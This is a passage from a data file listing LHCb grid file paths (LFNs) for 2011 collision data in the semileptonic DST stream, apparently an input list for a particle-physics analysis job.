'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019302_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039583_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000901_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010502_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038763_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022517_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068615_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014649_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065788_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009093_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021128_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031491_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029772_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004003_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021968_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012566_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013729_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050822_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037408_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013541_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058103_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003906_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066708_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069458_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003685_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053202_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064834_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043485_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066856_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049755_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052757_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028506_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039546_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032693_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061236_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022375_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023004_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046324_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049039_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058384_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062732_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052391_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014548_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068779_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011846_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020206_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027644_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063673_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057187_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020514_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058544_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039512_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062783_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007374_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054358_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043180_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018923_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013410_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044386_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057294_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059750_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044316_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016695_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003619_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048968_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006722_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048770_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050318_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027819_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041597_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004509_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030086_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006106_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039361_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029415_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050372_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052626_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043310_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006151_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006229_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007029_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001284_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000168_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025988_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067754_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024928_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000154_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063444_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033214_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063357_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024591_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066712_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065785_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033193_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026412_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059842_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026995_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043969_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028325_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057577_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068759_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060175_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015408_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043704_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006257_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044138_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059719_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014419_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060267_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019733_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020336_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056031_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002358_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050347_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000241_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017277_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007118_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010459_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032890_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066529_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064458_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036637_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017116_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057256_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062744_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056380_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027250_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059119_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039684_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032214_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060805_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036129_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059437_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052518_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006573_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026110_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025584_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042340_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062730_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061988_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014849_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016958_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040853_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060900_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025344_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026953_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037187_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048213_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018517_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039888_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003454_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031682_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000112_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007428_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062621_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050709_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006432_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000211_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063917_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068698_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058611_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033524_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057580_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019680_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046753_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007254_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040400_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015113_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005411_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004817_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034633_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021776_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050525_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011123_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008764_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006383_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052179_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056155_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057429_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051118_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014916_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057664_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006182_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056229_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050470_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040714_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024657_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039993_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020063_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004908_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057135_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062701_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050359_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028570_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040398_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036769_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024964_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007912_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039229_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054194_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031697_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050766_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045907_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057096_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063291_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062064_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034635_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023691_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062695_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001781_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056420_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058374_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023809_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035092_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043483_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060758_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008732_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020759_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013179_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063926_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018689_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009127_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036992_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039982_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061816_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039547_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035748_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008946_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016435_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056844_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035190_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043975_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00017325_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063491_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022808_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001894_1.semileptonic.dst',
